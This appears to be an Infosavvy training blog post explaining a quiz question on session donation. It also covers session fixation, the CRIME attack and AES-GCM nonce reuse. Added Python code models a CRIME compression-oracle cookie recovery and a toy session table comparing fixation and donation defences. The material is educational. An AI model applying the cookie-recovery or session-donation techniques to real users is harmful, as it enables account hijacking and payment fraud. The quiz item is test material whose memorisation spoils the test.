session ID

Boney, a professional hacker, targets an organization for financial gain. He performs an attack by sending his own session ID to the victim using an MITM technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing anything to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?


Option 1: Session fixation attack
Option 2: CRIME attack
Option 3: Session donation attack
Option 4: Forbidden attack

1. Session fixation attack

Session fixation is an attack that allows an attacker to hijack a valid user session. It exploits a weakness in the way a web application manages session IDs: a vulnerable application does not issue a new session ID when a user authenticates, so an already existing session ID can be reused. The attack consists of obtaining a valid session ID (for example by simply connecting to the application), inducing the victim to authenticate with that session ID, and then hijacking the authenticated session using the known session ID. The attacker therefore has to supply a session ID that the application accepts and find a way to make the victim's browser use it.

Session fixation is a class of session hijacking. Classic session hijacking steals the session established between the client and the web server after the user logs in; session fixation instead plants a session ID in the victim's browser in advance, so the attack starts before the user logs in.

There are several techniques to carry out the attack, depending on how the web application handles session tokens. The most common are:

  • Session token in a URL argument: the session ID is sent to the victim in a link, and the victim reaches the site through that malicious URL.
  • Session token in a hidden form field: the victim is tricked into authenticating to the target web server through a login form crafted by the attacker, which carries the fixed session ID in a hidden field. The form may be hosted on the attacker's web server or embedded directly in an HTML-formatted e-mail.
  • Session ID in a cookie (client-side script): most browsers execute client-side script, so the attacker can use a code-injection attack such as cross-site scripting (XSS) to place a script in the link sent to the victim that sets the session ID in the victim's cookie. Through the document.cookie property, the script writes the value the browser will then present to keep its session with the web application.

2. CRIME attack

CRIME (Compression Ratio Info-leak Made Easy) is a security exploit against secret web cookies sent over connections using the HTTPS and SPDY protocols when they also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking on an authenticated web session, enabling further attacks. CRIME was assigned CVE-2012-4929.

The vulnerability exploited is a combination of a chosen-plaintext attack and inadvertent information leakage through data compression, similar to that described in 2002 by the cryptographer John Kelsey. It relies on the attacker being able to observe the size of the ciphertext sent by the browser while at the same time inducing the browser to make multiple carefully crafted requests to the target site. The attacker then watches how the size of the compressed request payload, which contains both the secret cookie that the browser sends only to the target site and variable content chosen by the attacker, changes as that variable content is altered. When the compressed size shrinks, it can be inferred that part of the injected content probably matches part of the source, which includes the secret the attacker wants to recover. Divide-and-conquer techniques then home in on the true secret in a relatively small number of probe attempts, a small multiple of the number of secret bytes to be recovered.
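The probing loop described above, reduced to a runnable model. This is an added example, not code from the original page or from the CRIME authors: a local DEFLATE call stands in for the TLS channel, so the only thing the "attacker" learns from compressed_size is a length, which is exactly what a network observer sees. The cookie value, host name and URL are constructed for the demo, and the use of zlib.Z_FIXED together with the padding trick in aligned_cost are assumptions made so that DEFLATE's rounding to whole bytes cannot mask a one-literal difference between candidates.

```python
import zlib

# Constructed sample: the secret cookie the browser adds to every request to the target site.
SECRET_COOKIE = b"sessionid=7f3a9c1e"
HEX = "0123456789abcdef"
Z_FIXED = getattr(zlib, "Z_FIXED", 4)  # value 4 in zlib.h; exported by current Python builds


def compressed_size(attacker_controlled, filler=b""):
    """Oracle standing in for the network observer: the length of the compressed
    request. TLS hides the bytes, but with compression enabled it does not hide
    how many there are. Z_FIXED keeps the DEFLATE symbol costs constant (8 bits
    per literal byte below 144, 9 bits above), which makes the demo deterministic."""
    request = (filler + b"GET /?q=" + attacker_controlled + b" HTTP/1.1\r\n"
               b"Host: bank.test\r\n"
               b"Cookie: " + SECRET_COOKIE + b"\r\n\r\n")
    comp = zlib.compressobj(level=9, strategy=Z_FIXED)
    return len(comp.compress(request) + comp.flush())


def aligned_cost(guess):
    """DEFLATE output is rounded up to whole bytes, so the bits saved by one longer
    match can vanish in the rounding. Prepending 0..7 distinct high bytes (9-bit
    literals, no repeated 3-grams) walks the stream through every bit alignment;
    the sum of the eight lengths grows exactly linearly with the true bit count,
    so the candidate with the longest match always has the lowest sum."""
    return sum(compressed_size(guess, bytes(range(0x90, 0x90 + i))) for i in range(8))


def recover(known, length, alphabet=HEX):
    """Extend `known` one byte at a time. The candidate that compresses best is the
    one that lengthens the LZ77 back-reference from the cookie to our guess."""
    for _ in range(length):
        best = min(alphabet, key=lambda c: aligned_cost(known + c.encode()))
        known += best.encode()
    return known


if __name__ == "__main__":
    # The attacker knows the cookie name and that the value is 8 hex digits.
    print(recover(b"sessionid=", 8).decode())   # sessionid=7f3a9c1e
```

Each recovered byte costs 16 candidates, so the whole value falls in a small multiple of its length, which is the divide-and-conquer figure quoted above. A real attack has to contend with dynamic Huffman tables and network jitter, which is why CRIME and its successors repeat probes and compare relative sizes rather than trusting a single length.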

3. Session donation attack

Session donation relies on social engineering to make it possible. The attacker creates an account, logs in, and sends the victim a link that already carries the attacker's authenticated session. The victim is persuaded to enter additional details into what appears to be their own account but is in fact the attacker's. Because users are accustomed to being logged in across many sites, a link that lands them on an already authenticated page raises little suspicion.

  • Precisely what it sounds like: donating your session ID (SID) to someone else.
  • Very similar to session fixation: you want to fix the victim's session to a particular ID.
  • Several session fixation countermeasures will not work against it, in particular:
    • accepting only server-generated IDs from a cookie;
    • regenerating SIDs on login.
  • It is much easier to give someone your identity than to steal theirs.

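The following Python model is added here as an illustration of both the session fixation techniques above and the session donation bullets; it is not code from the original page or from any product. A toy in-memory session table stands in for the web application, and the Server flags, user names, passwords, card number and session IDs are all constructed for the demo. It shows why regenerating the session ID at login stops fixation but leaves donation untouched, and that a countermeasure aimed at the donated session itself, here re-entering the account password on the payment form, is what blocks it.

```python
import secrets

# Constructed demo accounts; nothing here is a real credential.
USERS = {"attacker": "attacker-pw", "victim": "victim-pw"}


class Server:
    """Toy web application holding a server-side session table.

    accept_client_sid:   adopt an unknown, client-supplied session ID as-is
                         (the weakness that makes fixation possible).
    regenerate_on_login: issue a fresh ID when a user authenticates
                         (the standard fixation countermeasure).
    reauth_for_payments: demand the account password again on the payment
                         form (a countermeasure that also covers donation).
    """

    def __init__(self, accept_client_sid, regenerate_on_login, reauth_for_payments=False):
        self.accept_client_sid = accept_client_sid
        self.regenerate_on_login = regenerate_on_login
        self.reauth_for_payments = reauth_for_payments
        self.sessions = {}  # sid -> {"user": str | None, "payments": [card, ...]}

    def _new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None, "payments": []}
        return sid

    def request(self, presented_sid):
        """Decide which session a request belongs to and return its ID."""
        if presented_sid in self.sessions:
            return presented_sid
        if presented_sid is not None and self.accept_client_sid:
            # Vulnerable behaviour: trust whatever ID the client sends.
            self.sessions[presented_sid] = {"user": None, "payments": []}
            return presented_sid
        return self._new_session()

    def login(self, presented_sid, user, password):
        sid = self.request(presented_sid)
        if USERS.get(user) != password:
            raise PermissionError("bad credentials")
        if self.regenerate_on_login:
            # Move the session state under a brand-new ID; the old ID dies here.
            state = self.sessions.pop(sid)
            sid = secrets.token_hex(16)
            self.sessions[sid] = state
        self.sessions[sid]["user"] = user
        return sid

    def submit_payment(self, presented_sid, card, password=None):
        """Store card details against the logged-in account and return that account."""
        session = self.sessions[self.request(presented_sid)]
        if session["user"] is None:
            raise PermissionError("not logged in")
        if self.reauth_for_payments and USERS[session["user"]] != password:
            raise PermissionError("re-authentication failed")
        session["payments"].append(card)
        return session["user"]


def session_fixation_succeeds(server):
    """Attacker plants an ID of its choosing before the victim logs in
    (delivery via URL, hidden field or cookie is not modelled)."""
    fixed_sid = "attacker-chosen-sid"
    sid = server.request(fixed_sid)            # victim's first request carries the planted ID
    server.login(sid, "victim", "victim-pw")   # victim authenticates on top of it
    # Attacker replays the ID it planted: is it now the victim's authenticated session?
    return server.sessions.get(fixed_sid, {}).get("user") == "victim"


def session_donation_succeeds(server):
    """Attacker logs into its own account and hands that authenticated ID to the victim."""
    attacker_sid = server.login(None, "attacker", "attacker-pw")
    # The victim follows the link and, already logged in, never authenticates.
    # If the payment form asks for a password, the victim types their own.
    try:
        owner = server.submit_payment(attacker_sid, "4111 1111 1111 1111", password="victim-pw")
    except PermissionError:
        return False
    return owner == "attacker"   # the victim's card details landed in the attacker's account


if __name__ == "__main__":
    print("fixation vs vulnerable server   :", session_fixation_succeeds(Server(True, False)))       # True
    print("fixation vs regenerating server :", session_fixation_succeeds(Server(True, True)))        # False
    print("donation vs regenerating server :", session_donation_succeeds(Server(False, True)))       # True
    print("donation with re-auth on payment:", session_donation_succeeds(Server(False, True, True))) # False
```

The regenerating server defeats fixation because the planted ID is discarded the moment the victim logs in. It does nothing against donation: the donated ID was generated by the server and already authenticated, so the victim never triggers a login and the regeneration code never runs. Only a check that ties the sensitive action to the person at the keyboard, such as re-authentication, or an unmistakable display of which account is active, breaks the scenario in the question.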
4. Forbidden attack

Dozens of HTTPS-protected websites belonging to the financial services giant Visa are vulnerable to attacks that enable hackers to inject malicious code and forged content into the browsers of visitors, an international team of researchers has found.

In all, 184 servers, some belonging to the German stock exchange Deutsche Börse and the Polish banking association Związek Banków Polskich, were also found to be vulnerable to a decade-old exploit technique cryptographers have dubbed the "forbidden attack". A further 70,000 web servers were found to be at risk, though the work needed to carry out the attack successfully may prove prohibitively difficult. The data came from an Internet-wide scan performed in January. Since then, Deutsche Börse has remedied the problem, but, as of Wednesday, both Visa and Związek Banków Polskich have allowed the vulnerability to remain and have yet to reply to any of the researchers' private disclosures. The technique itself exploits nonce reuse in AES-GCM: once a TLS server repeats a GCM nonce under the same key, an attacker who captures the affected records can recover the authentication key and forge ciphertext that the client accepts.



This Blog Article is posted by

Infosavvy, 2nd Floor, Sai Niketan, Chandavalkar Road Opp. Gora Gandhi Hotel, Above Jumbo King, beside Speakwell Institute, Borivali West, Mumbai, Maharashtra 400092

Contact us – www.info-savvy.com
